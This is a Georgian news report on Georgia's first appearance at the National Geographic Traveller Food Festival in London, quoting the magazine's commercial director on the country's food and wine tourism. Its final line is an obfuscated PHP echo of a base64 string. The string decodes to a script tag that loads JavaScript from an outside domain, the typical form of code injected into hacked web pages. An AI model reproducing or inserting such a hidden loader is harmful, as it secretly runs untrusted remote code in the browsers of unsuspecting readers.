celsiusi
ავერსი საქკაბელი

 საქართველოსთვის National Geographic-ის ფესტივალში მონაწილეობა შესანიშნავი შესაძლებლობაა ვიზიტორების მოსაზიდად, - ამის შესახებ National Geographic Traveller-ის კომერციულმა დირექტორმა მეთ მიდვორსმა განაცხადა.

მეთ მივდვორსის განცხადებით, საქართველომ ფესტივალში მონაწილეობით დიდი წარმატებას მიაღწია.

„საქართველოსთვის National Geographic-ის გასტრონომიულ ფესტივალში მონაწილეობა შესანიშნავი შესაძლებლობაა ქვეყნისთვის. საქართველოს შეუძლია შთააგონოს და მოიზიდოს ვიზიტორები თავისი კვებისა და ღვინის მდიდარი კულტურით. ძალიან მოხარული ვარ, რომ ამ ფესტივალში საქართველოა წარმოდგენილი“, - განაცხადა მეთ მიდვორსმა.

„საქართველოს ტურიზმის ეროვნულმა ადმინისტრაციამ დიდ ბრიტანეთში, ლონდონში, The National Geographic Traveller Food Festival-ზე, პირველად მიიღო მონაწილეობა. საერთაშორისო გასტრონომიულ ფესტივალზე, “მასტერკლასის თეატრში” ქართული ღვინისა და კერძების მასტერკლასების 4 სესია გაიმართა. ფესტივალის ფარგლებში, საქართველოს სტენდზე, ორი დღის განმავლობაში, ღვინის დეგუსტაცია და ე.წ. Show Kitchen ჩატარდა“, - ნათქვამია საქართველოს ტურიზმის ადმინისტრაციის მიერ გავრცელებულ ინფორმაციაში.

232
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");